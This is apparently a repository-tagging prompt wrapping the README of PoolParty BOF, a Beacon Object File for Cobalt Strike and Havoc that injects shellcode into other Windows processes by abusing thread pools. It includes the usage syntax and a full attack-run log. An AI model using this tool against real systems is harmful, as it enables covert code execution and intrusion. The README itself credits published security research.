base on A beacon object file implementation of PoolParty Process Injection Technique. # PoolParty BOF A beacon object file implementation of [PoolParty Process Injection Technique](https://github.com/SafeBreach-Labs/PoolParty/) by [@_SafeBreach_](https://www.safebreach.com/) and [@_0xDeku_](https://twitter.com/_0xDeku), that abuses Windows Thread Pools. The BOF supports the 5 technique/variant: - Insert TP_IO work item to the target process's thread pool. - Insert TP_ALPC work item to the target process's thread pool. - Insert TP_JOB work item to the target process's thread pool. - Insert TP_DIRECT work item to the target process's thread pool. - Insert TP_TIMER work item to the target process's thread pool. I will try to keep adding remaining variants. ## Usage ``` PoolPartyBof <Process ID> <Path To Shellcode> <Variant> ``` - Usage Examples ``` PoolPartyBof 2136 /tmp/beacon_x64.bin 4 [*] Opening 2136 and running PoolParty with /tmp/beacon_x64.bin shellcode! [+] host called home, sent: 314020 bytes [+] received output: [INFO] Shellcode Size: 307200 bytes [+] received output: [INFO] Starting PoolParty attack against process id: 2136 [+] received output: [INFO] Retrieved handle to the target process: 0000000000000670 [+] received output: [INFO] Hijacked worker factory handle from the target process: 000000C96E0FF5B8 [+] received output: [INFO] Hijacked timer queue handle from the target process: 000000C96E0FF5B8 [+] received output: [INFO] Allocated shellcode memory in the target process: 00000290C91B0000 [+] received output: [INFO] Written shellcode to the target process [+] received output: [INFO] Retrieved target worker factory basic information [+] received output: [INFO] Created TP_TIMER structure associated with the shellcode [+] received output: [INFO] Allocated TP_TIMER memory in the target process: 00000290C9200000 [+] received output: [INFO] Written the specially crafted TP_TIMER structure to the target process [+] received output: [INFO] Modified the target process's TP_POOL timer queue WindowsStart and Windows End to point to the specially crafted TP_TIMER [+] received output: [INFO] Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration [+] received output: [INFO] PoolParty attack completed. ```   > The BOF can be further used with [Process Injection Hooks](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/malleable-c2-extend_control-process-injection.htm) provided within Cobaltstrike, and [Rastamouse](https://twitter.com/_RastaMouse) has a perfect [blog](https://offensivedefence.co.uk/posts/cs-process-inject-kit/) too. > Added [Havoc](https://github.com/HavocFramework/Havoc/) BOF support. You are welcome to open an issue, if something doesn't work. For [sliver C2](https://github.com/BishopFox/sliver) it partially works, but Somehow the remote process crashes when executed the shellcode. ### Credits and Orginal Work - [Blackhat Slides](https://www.blackhat.com/eu-23/briefings/schedule/#the-pool-party-you-will-never-forget-new-process-injection-techniques-using-windows-thread-pools-35446) - [Alon Leviev](https://twitter.com/_0xDeku) - [SafeBreach](https://www.safebreach.com/) ", Assign "at most 3 tags" to the expected json: {"id":"5930","tags":[]} "only from the tags list I provide: [{"id":77,"name":"3d"},{"id":89,"name":"agent"},{"id":17,"name":"ai"},{"id":54,"name":"algorithm"},{"id":24,"name":"api"},{"id":44,"name":"authentication"},{"id":3,"name":"aws"},{"id":27,"name":"backend"},{"id":60,"name":"benchmark"},{"id":72,"name":"best-practices"},{"id":39,"name":"bitcoin"},{"id":37,"name":"blockchain"},{"id":1,"name":"blog"},{"id":45,"name":"bundler"},{"id":58,"name":"cache"},{"id":21,"name":"chat"},{"id":49,"name":"cicd"},{"id":4,"name":"cli"},{"id":64,"name":"cloud-native"},{"id":48,"name":"cms"},{"id":61,"name":"compiler"},{"id":68,"name":"containerization"},{"id":92,"name":"crm"},{"id":34,"name":"data"},{"id":47,"name":"database"},{"id":8,"name":"declarative-gui "},{"id":9,"name":"deploy-tool"},{"id":53,"name":"desktop-app"},{"id":6,"name":"dev-exp-lib"},{"id":59,"name":"dev-tool"},{"id":13,"name":"ecommerce"},{"id":26,"name":"editor"},{"id":66,"name":"emulator"},{"id":62,"name":"filesystem"},{"id":80,"name":"finance"},{"id":15,"name":"firmware"},{"id":73,"name":"for-fun"},{"id":2,"name":"framework"},{"id":11,"name":"frontend"},{"id":22,"name":"game"},{"id":81,"name":"game-engine "},{"id":23,"name":"graphql"},{"id":84,"name":"gui"},{"id":91,"name":"http"},{"id":5,"name":"http-client"},{"id":51,"name":"iac"},{"id":30,"name":"ide"},{"id":78,"name":"iot"},{"id":40,"name":"json"},{"id":83,"name":"julian"},{"id":38,"name":"k8s"},{"id":31,"name":"language"},{"id":10,"name":"learning-resource"},{"id":33,"name":"lib"},{"id":41,"name":"linter"},{"id":28,"name":"lms"},{"id":16,"name":"logging"},{"id":76,"name":"low-code"},{"id":90,"name":"message-queue"},{"id":42,"name":"mobile-app"},{"id":18,"name":"monitoring"},{"id":36,"name":"networking"},{"id":7,"name":"node-version"},{"id":55,"name":"nosql"},{"id":57,"name":"observability"},{"id":46,"name":"orm"},{"id":52,"name":"os"},{"id":14,"name":"parser"},{"id":74,"name":"react"},{"id":82,"name":"real-time"},{"id":56,"name":"robot"},{"id":65,"name":"runtime"},{"id":32,"name":"sdk"},{"id":71,"name":"search"},{"id":63,"name":"secrets"},{"id":25,"name":"security"},{"id":85,"name":"server"},{"id":86,"name":"serverless"},{"id":70,"name":"storage"},{"id":75,"name":"system-design"},{"id":79,"name":"terminal"},{"id":29,"name":"testing"},{"id":12,"name":"ui"},{"id":50,"name":"ux"},{"id":88,"name":"video"},{"id":20,"name":"web-app"},{"id":35,"name":"web-server"},{"id":43,"name":"webassembly"},{"id":69,"name":"workflow"},{"id":87,"name":"yaml"}]" returns me the "expected json"